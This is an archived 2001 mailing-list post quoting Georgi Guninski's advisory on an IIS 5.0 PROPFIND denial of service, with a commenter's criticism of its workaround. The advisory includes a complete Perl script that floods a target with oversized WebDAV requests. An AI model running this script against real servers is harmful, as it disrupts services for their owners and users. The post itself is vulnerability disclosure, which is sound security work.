|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Steve (steve
SECURESOLUTIONS.ORG)Date: Sun May 06 2001 - 18:24:46 CDT
As usual, the workaround section, quoted below, is lame and not thought out.
Disabling WebDav does help, and hopefully there will be a MS patch soon.
> Workaround: Disabling WebDav extensions may help
> though I do not recommend using IIS on the Internet.
Here is his advisory:
----------------------------------------------------------------------------
----------------------------------------------------
Georgi Guninski security advisory #44, 2001
IIS 5.0 PROPFIND DOS #2
Systems affected:
IIS 5.0
Risk: Medium
Date: 6 May 2001
Description:
It is possible to remotely restart all IIS related services using specially
crafted
request.
If this request is repeated continously this seriously affects IIS
performance.
Details:
Basically the problem are very long but valid propfind request containing
lots of ":".
Demonstration:
--vv9.pl-------------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "Written by Georgi Guninski wait some time\n";
$port = ARGV[1];
$host = ARGV[0];
sub vv()
{
$ll=$_[0];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto =>
"TCP") ||
return;
$over=":" x $ll ; # the ":" is the most important
$ch=pack("C",65); # just to check whether potentail payload is possible -
yes
$tmp = $ch x 64;
$over= $ch x 4 . $over . $tmp;
$over1=":" x $ll; #not sure about this
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:"
xmlns:u="'."$over1".':">';
$xml=$xml.'<a:prop><a:displayname />'."<u:$over
/>".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1\.1\nContent-type: text/xml\nHost:
$host\nContent-length:
$l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,200);
print $res;
close $socket;
}
do vv(59060);
#this is overflow, repeat several times - 49060 seems the smallest #, may
need to change
sleep(1);
do vv(59060);
---------------------------------------------------------------------------
Workaround: Disabling WebDav extensions may help
though I do not recommend using IIS on the Internet.
Vendor status:
Microsoft was informed on 1 May 2001
Regards,
Georgi Guninski
http://www.guninski.com
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]